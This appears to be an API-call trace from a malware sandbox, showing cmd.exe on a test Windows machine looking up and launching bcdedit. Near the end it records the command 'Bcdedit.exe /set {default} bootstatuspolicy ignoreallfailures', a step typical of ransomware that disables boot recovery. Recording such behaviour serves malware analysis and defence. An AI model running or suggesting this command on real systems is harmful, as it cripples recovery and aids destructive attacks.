_wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0042.090] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0042.090] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0042.090] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0042.090] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0042.090] GetProcessHeap () returned 0x360000 [0042.090] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x5c) returned 0x361320 [0042.090] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f470 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f470, lpFilePart=0x18f450 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f450*="Desktop") returned 0x25 [0042.090] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0042.090] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f180 | out: lpFindFileData=0x18f180*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd70000d7, cFileName="Users", cAlternateFileName="")) returned 0x3789b0 [0042.090] FindClose (in: hFindFile=0x3789b0 | out: hFindFile=0x3789b0) returned 1 [0042.090] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f180 | out: lpFindFileData=0x18f180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd70000d7, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3789b0 [0042.091] FindClose (in: hFindFile=0x3789b0 | out: hFindFile=0x3789b0) returned 1 [0042.091] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0042.091] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f180 | out: lpFindFileData=0x18f180*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd70000d7, cFileName="Desktop", cAlternateFileName="")) returned 0x3789b0 [0042.091] FindClose (in: hFindFile=0x3789b0 | out: hFindFile=0x3789b0) returned 1 [0042.091] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0042.091] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0042.091] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0042.091] GetProcessHeap () returned 0x360000 [0042.091] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7c0 | out: hHeap=0x360000) returned 1 [0042.091] GetEnvironmentStringsW () returned 0x378b50* [0042.091] GetProcessHeap () returned 0x360000 [0042.091] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xae8) returned 0x37ad20 [0042.091] FreeEnvironmentStringsW (penv=0x378b50) returned 1 [0042.091] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.091] GetProcessHeap () returned 0x360000 [0042.091] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x361320 | out: hHeap=0x360000) returned 1 [0042.091] GetProcessHeap () returned 0x360000 [0042.091] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x4016) returned 0x37cd50 [0042.092] GetProcessHeap () returned 0x360000 [0042.092] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x90) returned 0x37b810 [0042.092] GetProcessHeap () returned 0x360000 [0042.092] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37cd50 | out: hHeap=0x360000) returned 1 [0042.092] GetConsoleOutputCP () returned 0x1b5 [0042.092] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0042.092] GetUserDefaultLCID () returned 0x409 [0042.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2 [0042.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f580, cchData=128 | out: lpLCData="0") returned 2 [0042.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f580, cchData=128 | out: lpLCData="0") returned 2 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f580, cchData=128 | out: lpLCData="1") returned 2 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2 [0042.093] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0042.093] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0042.094] GetProcessHeap () returned 0x360000 [0042.094] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x20c) returned 0x37b920 [0042.094] GetConsoleTitleW (in: lpConsoleTitle=0x37b920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0042.094] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0042.094] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0042.094] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0042.094] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0042.094] GetProcessHeap () returned 0x360000 [0042.094] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x4012) returned 0x37cd50 [0042.094] GetProcessHeap () returned 0x360000 [0042.094] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37cd50 | out: hHeap=0x360000) returned 1 [0042.095] _wcsicmp (_String1="Bcdedit.exe", _String2=")") returned 57 [0042.095] _wcsicmp (_String1="FOR", _String2="Bcdedit.exe") returned 4 [0042.095] _wcsicmp (_String1="FOR/?", _String2="Bcdedit.exe") returned 4 [0042.095] _wcsicmp (_String1="IF", _String2="Bcdedit.exe") returned 7 [0042.095] _wcsicmp (_String1="IF/?", _String2="Bcdedit.exe") returned 7 [0042.095] _wcsicmp (_String1="REM", _String2="Bcdedit.exe") returned 16 [0042.095] _wcsicmp (_String1="REM/?", _String2="Bcdedit.exe") returned 16 [0042.095] GetProcessHeap () returned 0x360000 [0042.095] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0) returned 0x37bb40 [0042.095] GetProcessHeap () returned 0x360000 [0042.095] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x28) returned 0x374640 [0042.096] GetProcessHeap () returned 0x360000 [0042.096] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x76) returned 0x37bc00 [0042.097] GetConsoleTitleW (in: lpConsoleTitle=0x18f490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0042.139] GetFileAttributesW (lpFileName="Bcdedit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bcdedit.exe")) returned 0xffffffff [0042.139] _wcsicmp (_String1="Bcdedit", _String2="DIR") returned -2 [0042.139] _wcsicmp (_String1="Bcdedit", _String2="ERASE") returned -3 [0042.139] _wcsicmp (_String1="Bcdedit", _String2="DEL") returned -2 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="TYPE") returned -18 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="COPY") returned -1 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="CD") returned -1 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="CHDIR") returned -1 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="RENAME") returned -16 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="REN") returned -16 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="ECHO") returned -3 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="SET") returned -17 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="PAUSE") returned -14 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="DATE") returned -2 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="TIME") returned -18 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="PROMPT") returned -14 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="MD") returned -11 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="MKDIR") returned -11 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="RD") returned -16 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="RMDIR") returned -16 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="PATH") returned -14 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="GOTO") returned -5 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="SHIFT") returned -17 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="CLS") returned -1 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="CALL") returned -1 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="VERIFY") returned -20 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="VER") returned -20 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="VOL") returned -20 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="EXIT") returned -3 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="SETLOCAL") returned -17 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="ENDLOCAL") returned -3 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="TITLE") returned -18 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="START") returned -17 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="DPATH") returned -2 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="KEYS") returned -9 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="MOVE") returned -11 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="PUSHD") returned -14 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="POPD") returned -14 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="ASSOC") returned 1 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="FTYPE") returned -4 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="BREAK") returned -15 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="COLOR") returned -1 [0042.140] _wcsicmp (_String1="Bcdedit", _String2="MKLINK") returned -11 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="DIR") returned -2 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="ERASE") returned -3 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="DEL") returned -2 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="TYPE") returned -18 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="COPY") returned -1 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="CD") returned -1 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="CHDIR") returned -1 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="RENAME") returned -16 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="REN") returned -16 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="ECHO") returned -3 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="SET") returned -17 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="PAUSE") returned -14 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="DATE") returned -2 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="TIME") returned -18 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="PROMPT") returned -14 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="MD") returned -11 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="MKDIR") returned -11 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="RD") returned -16 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="RMDIR") returned -16 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="PATH") returned -14 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="GOTO") returned -5 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="SHIFT") returned -17 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="CLS") returned -1 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="CALL") returned -1 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="VERIFY") returned -20 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="VER") returned -20 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="VOL") returned -20 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="EXIT") returned -3 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="SETLOCAL") returned -17 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="ENDLOCAL") returned -3 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="TITLE") returned -18 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="START") returned -17 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="DPATH") returned -2 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="KEYS") returned -9 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="MOVE") returned -11 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="PUSHD") returned -14 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="POPD") returned -14 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="ASSOC") returned 1 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="FTYPE") returned -4 [0042.141] _wcsicmp (_String1="Bcdedit", _String2="BREAK") returned -15 [0042.142] _wcsicmp (_String1="Bcdedit", _String2="COLOR") returned -1 [0042.142] _wcsicmp (_String1="Bcdedit", _String2="MKLINK") returned -11 [0042.142] _wcsicmp (_String1="Bcdedit", _String2="FOR") returned -4 [0042.142] _wcsicmp (_String1="Bcdedit", _String2="IF") returned -7 [0042.142] _wcsicmp (_String1="Bcdedit", _String2="REM") returned -16 [0042.142] GetProcessHeap () returned 0x360000 [0042.142] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x218) returned 0x37bc80 [0042.142] GetProcessHeap () returned 0x360000 [0042.142] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x8e) returned 0x37bea0 [0042.142] _wcsnicmp (_String1="Bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0042.142] GetProcessHeap () returned 0x360000 [0042.143] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x420) returned 0x361320 [0042.143] SetErrorMode (uMode=0x0) returned 0x0 [0042.143] SetErrorMode (uMode=0x1) returned 0x0 [0042.143] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x361330, lpFilePart=0x18ed20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18ed20*="Desktop") returned 0x25 [0042.143] SetErrorMode (uMode=0x0) returned 0x1 [0042.143] GetProcessHeap () returned 0x360000 [0042.143] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x361320, Size=0x74) returned 0x361320 [0042.143] GetProcessHeap () returned 0x360000 [0042.143] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x361320) returned 0x74 [0042.143] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0042.143] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.143] GetProcessHeap () returned 0x360000 [0042.143] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x128) returned 0x37bf40 [0042.143] GetProcessHeap () returned 0x360000 [0042.143] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x240) returned 0x3613b0 [0042.148] GetProcessHeap () returned 0x360000 [0042.148] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x3613b0, Size=0x12a) returned 0x3613b0 [0042.148] GetProcessHeap () returned 0x360000 [0042.148] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x3613b0) returned 0x12a [0042.148] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.148] GetProcessHeap () returned 0x360000 [0042.148] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xe8) returned 0x37c070 [0042.149] GetProcessHeap () returned 0x360000 [0042.149] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x37c070, Size=0x7e) returned 0x37c070 [0042.149] GetProcessHeap () returned 0x360000 [0042.149] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37c070) returned 0x7e [0042.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.149] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x18ea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea90) returned 0xffffffffffffffff [0042.149] GetLastError () returned 0x2 [0042.150] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x18ea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea90) returned 0xffffffffffffffff [0042.150] GetLastError () returned 0x2 [0042.150] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x18ea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea90) returned 0xffffffffffffffff [0042.150] GetLastError () returned 0x2 [0042.150] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.150] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\Bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x18ea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea90) returned 0x3789b0 [0042.150] GetProcessHeap () returned 0x360000 [0042.150] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x28) returned 0x374670 [0042.150] FindClose (in: hFindFile=0x3789b0 | out: hFindFile=0x3789b0) returned 1 [0042.150] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0042.150] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0042.150] GetConsoleTitleW (in: lpConsoleTitle=0x18efe0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0042.151] InitializeProcThreadAttributeList (in: lpAttributeList=0x18ed98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ed58 | out: lpAttributeList=0x18ed98, lpSize=0x18ed58) returned 1 [0042.151] UpdateProcThreadAttribute (in: lpAttributeList=0x18ed98, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ed48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18ed98, lpPreviousValue=0x0) returned 1 [0042.151] GetStartupInfoW (in: lpStartupInfo=0x18eeb0 | out: lpStartupInfo=0x18eeb0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0042.151] GetProcessHeap () returned 0x360000 [0042.151] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x20) returned 0x3746a0 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0042.151] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0042.152] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0042.152] GetProcessHeap () returned 0x360000 [0042.152] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3746a0 | out: hHeap=0x360000) returned 1 [0042.152] GetProcessHeap () returned 0x360000 [0042.152] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x12) returned 0x3789b0 [0042.152] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0042.153] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18edd0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ed80 | out: lpCommandLine="Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x18ed80*(hProcess=0x54, hThread=0x50, dwProcessId=0xbac, dwThreadId=0xbb0)) returned 1 [0042.157] CloseHandle (hObject=0x50) returned 1 [0042.157] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0042.157] GetProcessHeap () returned 0x360000 [0042.157] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37ad20 | out: hHeap=0x360000) returned 1 [0042.157] GetEnvironmentStringsW () returned 0x37ad20* [0042.157] GetProcessHeap () returned 0x360000 [0042.157] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xae8) returned 0x378b50 [0042.157] FreeEnvironmentStringsW (penv=0x37ad20) returned 1 [0042.157] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0042.229] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18ecc8 | out: lpExitCode=0x18ecc8*=0x0) returned 1 [0042.230] CloseHandle (hObject=0x54) returned 1 [0042.230] _vsnwprintf (in: _Buffer=0x18ef38, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ecd8 | out: _Buffer="00000000") returned 8 [0042.230] 